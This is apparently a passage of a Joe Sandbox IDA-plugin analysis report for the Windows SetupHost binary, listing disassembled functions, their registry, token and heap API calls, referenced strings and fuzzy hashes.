                                                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB537
                                                                                                                        • LocalFree.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB567
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB576
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 3952319208-1711884389
                                                                                                                        • Opcode ID: d5b8aa0aef917b1defda855a28c514563981e4e90e1f13960f76b2e512022f3f
                                                                                                                        • Instruction ID: eda6caa23d743c8112fe10f2a0e56b9bbcd27f689427bb7a392167cb58237080
                                                                                                                        • Opcode Fuzzy Hash: d5b8aa0aef917b1defda855a28c514563981e4e90e1f13960f76b2e512022f3f
                                                                                                                        • Instruction Fuzzy Hash: F111B97190010CFBDF119B99D809BBEB7B6EB8130DF24506AA605632A0D77C9E05DB59
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(?,InstallTicks,00000000,00000006,00000000,?,00000001,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FC688
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 004FC6C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorLastQueryValueWow64
                                                                                                                        • String ID: InstallTicks$SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 1531546272-749814351
                                                                                                                        • Opcode ID: 08e6e9063709908837261656042ab0af012c9c6b5ae109958efd343c2a675e41
                                                                                                                        • Instruction ID: 9459e68f8163def8688ac1308e15fb606411cb0bf90fb6aef48e3201c877435b
                                                                                                                        • Opcode Fuzzy Hash: 08e6e9063709908837261656042ab0af012c9c6b5ae109958efd343c2a675e41
                                                                                                                        • Instruction Fuzzy Hash: 2A11C875A0420CABDF05EFA58AD5EBEB7B9EBC4304F20406FEA05D3351DA389E059625
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00501150: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 0050118B
                                                                                                                          • Part of subcall function 00501150: CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 005011A0
                                                                                                                          • Part of subcall function 00501150: FreeSid.ADVAPI32(?), ref: 005011BA
                                                                                                                          • Part of subcall function 00501150: SetLastError.KERNEL32(00000000), ref: 005011CB
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00552698,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0054031F,WdsSetupLogInit,?,0054031F,00552698), ref: 0053EDBF
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,0054031F,?,?,0054031F,00552698), ref: 0053EDD4
                                                                                                                        • FreeSid.ADVAPI32(0054031F,?,0054031F,00552698), ref: 0053EDE4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken$ErrorLast
                                                                                                                        • String ID: WdsSetupLogInit
                                                                                                                        • API String ID: 217881015-3317556560
                                                                                                                        • Opcode ID: 2125b1f8dc0190f551761461ca41e0ddb4c8758f3cbbc29594d6976ae439211f
                                                                                                                        • Instruction ID: fd6bcab1e3e03b54ad0ce473efe62dff239e85db90adb5758d62c9653af560fe
                                                                                                                        • Opcode Fuzzy Hash: 2125b1f8dc0190f551761461ca41e0ddb4c8758f3cbbc29594d6976ae439211f
                                                                                                                        • Instruction Fuzzy Hash: A5010871A0030DABDB10DFA5DC999AEBBF8FB48341F500869A502E6191DA70DA049A20
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegSetValueExW.KERNEL32(?,CorrelationVector,00000000,00000001,?,00000000,00000002,?,?,00000000,?,?,?,?,?), ref: 004FB191
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000002,?,?,00000000,?,?,?,?,?), ref: 004FB1C6
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                        • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 414203747-2351024219
                                                                                                                        • Opcode ID: 3413c884797ea384b147a652fbabe7b452dcd66f42972120d003d1dde1526ef9
                                                                                                                        • Instruction ID: bd60de611b46853884f4b4373475e717e3f9650e0a9efa27fd240b2509f9fffd
                                                                                                                        • Opcode Fuzzy Hash: 3413c884797ea384b147a652fbabe7b452dcd66f42972120d003d1dde1526ef9
                                                                                                                        • Instruction Fuzzy Hash: B1019275A0020CBBDF01AFA1D996ABE7B76EFC0348F20406EE601A6251DB799E049B54
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FCC17
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx, xrefs: 004FCC05, 004FCC37
                                                                                                                        • BuildLabEx, xrefs: 004FCC1D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: BuildLabEx$CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 431132790-2994999946
                                                                                                                        • Opcode ID: cc5916648612a7aa233985e00755113cdfd8cc60c240940ca5e467a1a1845d22
                                                                                                                        • Instruction ID: e835ccff3241c400466f2a3b8d5820915618418416ea4327cf9eef090d270f59
                                                                                                                        • Opcode Fuzzy Hash: cc5916648612a7aa233985e00755113cdfd8cc60c240940ca5e467a1a1845d22
                                                                                                                        • Instruction Fuzzy Hash: 4101B174B4022D878B05EF54CE81E7F7662BBD4B04B21402FEA04AF385CF788C018799
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053E611
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,0053E6FC,?,?,00000000,?,00000000), ref: 0053E629
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E633
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0053E6C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeH_prolog3HandleLastLibraryModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4191248489-0
                                                                                                                        • Opcode ID: dfb730ef4b3dbba37c5c0bfe44c5c6aea2d90fcfaf859369ded3d74444f05a6c
                                                                                                                        • Instruction ID: fec51f0a6da06f85635217976291df55293c432134a168c4bf09a7923886504b
                                                                                                                        • Opcode Fuzzy Hash: dfb730ef4b3dbba37c5c0bfe44c5c6aea2d90fcfaf859369ded3d74444f05a6c
                                                                                                                        • Instruction Fuzzy Hash: C421AC70A0121A8BDF18EFB5D8276BE7BB1BFA4301F14052DA446EB2D1DB309D008B40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0053E60A: __EH_prolog3.LIBCMT ref: 0053E611
                                                                                                                          • Part of subcall function 0053E60A: GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,0053E6FC,?,?,00000000,?,00000000), ref: 0053E629
                                                                                                                          • Part of subcall function 0053E60A: GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E633
                                                                                                                          • Part of subcall function 0053E60A: FreeLibrary.KERNEL32(00000000), ref: 0053E6C1
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E730
                                                                                                                        Strings
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053E73F
                                                                                                                        • Target OS version: %u.%u.%u.%u, xrefs: 0053E756
                                                                                                                        • ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion, xrefs: 0053E73A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FreeH_prolog3HandleLibraryModule
                                                                                                                        • String ID: ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion$Target OS version: %u.%u.%u.%u$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                        • API String ID: 4039679901-1364077200
                                                                                                                        • Opcode ID: 5580c704e5a932d566103dd51f73eff942747e1206dfd210854c514f51f84b2a
                                                                                                                        • Instruction ID: fb459b3ac35e1ae45415ba7c4e61d4e9d51afcc64d938d4f94b4be52ed687adc
                                                                                                                        • Opcode Fuzzy Hash: 5580c704e5a932d566103dd51f73eff942747e1206dfd210854c514f51f84b2a
                                                                                                                        • Instruction Fuzzy Hash: 2911AFB2604602AB8701DF69D886D6AFBE8FB98300B10461AF518C3250E770E914CBD2
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000002), ref: 00545433
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000002), ref: 00545459
                                                                                                                        • SetLastError.KERNEL32(00000001,?,?,?,00000000,00000000,00000002), ref: 00545466
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: `#T
                                                                                                                        • API String ID: 1452528299-1698295998
                                                                                                                        • Opcode ID: bf8d4377487964e21a8083fc8ca4aadabc4e7d220d33ca2e195937abf7203487
                                                                                                                        • Instruction ID: 1c30fe251febcfe2399494cb1cfeb21c2dd582152850eab032ca4d4070312fed
                                                                                                                        • Opcode Fuzzy Hash: bf8d4377487964e21a8083fc8ca4aadabc4e7d220d33ca2e195937abf7203487
                                                                                                                        • Instruction Fuzzy Hash: 21F0F631604B14ABDF141774FC1DB9E3F68FB6872BF200520F512DB1E1EAA19C45EA94
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0053E8E5: __EH_prolog3.LIBCMT ref: 0053E8EC
                                                                                                                          • Part of subcall function 0053E8E5: GetFileVersionInfoSizeExW.KERNELBASE(00000000,00000000,?,00000014,0053E880,?,?), ref: 0053E914
                                                                                                                          • Part of subcall function 0053E8E5: GetLastError.KERNEL32 ref: 0053E921
                                                                                                                        • VerQueryValueW.VERSION(00000000,004C44A4,?,kS,?,?,?,?,?,?,0053E66B), ref: 0053E89F
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0053E66B), ref: 0053E8A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileH_prolog3InfoQuerySizeValueVersion
                                                                                                                        • String ID: kS
                                                                                                                        • API String ID: 3811068625-3419900345
                                                                                                                        • Opcode ID: 20eac378a060acd4b35150ee1a32bfa75e423ba371b4e0dd8f54a7b8ec5aab50
                                                                                                                        • Instruction ID: c2d0c30775c45b2e8c92767f3e18ab7f0ee616df16025b91e83da356829fe273
                                                                                                                        • Opcode Fuzzy Hash: 20eac378a060acd4b35150ee1a32bfa75e423ba371b4e0dd8f54a7b8ec5aab50
                                                                                                                        • Instruction Fuzzy Hash: 34018835F0020CA7DF15BBB5DC46AAEBBB9BB84315F20447AB502A7181DA749E08A654
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegSetValueExW.KERNEL32(00000000,?,00000000,00000004,?,?,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB3AB
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB3E0
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                        Strings
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004FB372
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 414203747-1711884389
                                                                                                                        • Opcode ID: 149001819008f4d44cedc43fd601e276fd5176a60c6a3305f9ceffc762215e11
                                                                                                                        • Instruction ID: 0d488056702f0d1f1ad5baa5fee5e4b42fd4a64a70b6529214fc8ec2ddf6f34c
                                                                                                                        • Opcode Fuzzy Hash: 149001819008f4d44cedc43fd601e276fd5176a60c6a3305f9ceffc762215e11
                                                                                                                        • Instruction Fuzzy Hash: ED015271A0020DFBDF01AFA1DC85ABEBB76EF80358F20406FEA0597251DB799E059B54
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?,00000000,80000002,80000002,?,004FB5A2,?,00000000,?), ref: 004FC6F0
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,004FB5A2,?,00000000,?), ref: 004FC72B
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FC6E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen
                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 47109696-2278330950
                                                                                                                        • Opcode ID: bcded1e7e9dbd1f2aed6e1d73362f99a8340820efd819085a0a4f0c7c5c798a2
                                                                                                                        • Instruction ID: c83e4ca11df94dde200b7f5485943fd95aa6bf421903d2ffecbeb0b0f99dfbc2
                                                                                                                        • Opcode Fuzzy Hash: bcded1e7e9dbd1f2aed6e1d73362f99a8340820efd819085a0a4f0c7c5c798a2
                                                                                                                        • Instruction Fuzzy Hash: C101697091021CFBCF14EB91D989AAEBBB9EF98314F20405AB801A7250D7789F01DB54
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0054A1E5: RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A260
                                                                                                                          • Part of subcall function 0054A1E5: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A30E
                                                                                                                          • Part of subcall function 0054A1E5: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A315
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 00549486
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054948D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 005494B0
                                                                                                                        • HeapFree.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005494B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2792325425-0
                                                                                                                        • Opcode ID: e26400a31d5eddbb87a697a8694da68ae42eca9d2c8a770a6e92509584ec2c65
                                                                                                                        • Instruction ID: d1a3b765800a67ba130222cbfdc243146273c135f7e77e6294c5d99900c5f3e1
                                                                                                                        • Opcode Fuzzy Hash: e26400a31d5eddbb87a697a8694da68ae42eca9d2c8a770a6e92509584ec2c65
                                                                                                                        • Instruction Fuzzy Hash: F111C676700308ABCB109FA5D889AAF7FADFB88B19F10415DB80697250DB749D05D760
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00542E53: __EH_prolog3.LIBCMT ref: 00542E5A
                                                                                                                          • Part of subcall function 00542E53: memset.MSVCRT ref: 00542EDA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00002420,?,?,00000000), ref: 00542F90
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 00542F97
                                                                                                                        • memset.MSVCRT ref: 00542FB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heapmemset$AllocateH_prolog3Process
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 666435912-0
                                                                                                                        • Opcode ID: 7b8f5037abc09228b94928db7bc3219f82a6aa61e689c02102f43225134e5f41
                                                                                                                        • Instruction ID: 5b453cae093e3b234edd88936602354e506df0985bec149826615188fb2351bf
                                                                                                                        • Opcode Fuzzy Hash: 7b8f5037abc09228b94928db7bc3219f82a6aa61e689c02102f43225134e5f41
                                                                                                                        • Instruction Fuzzy Hash: F9418470A003059FDB18DF69D848AEEBFF5FF98304F14426AE80997296D734CA51CB64
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,?,?,004F8959,00000000,0000000C,004ECD31,00000000), ref: 004FB09C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
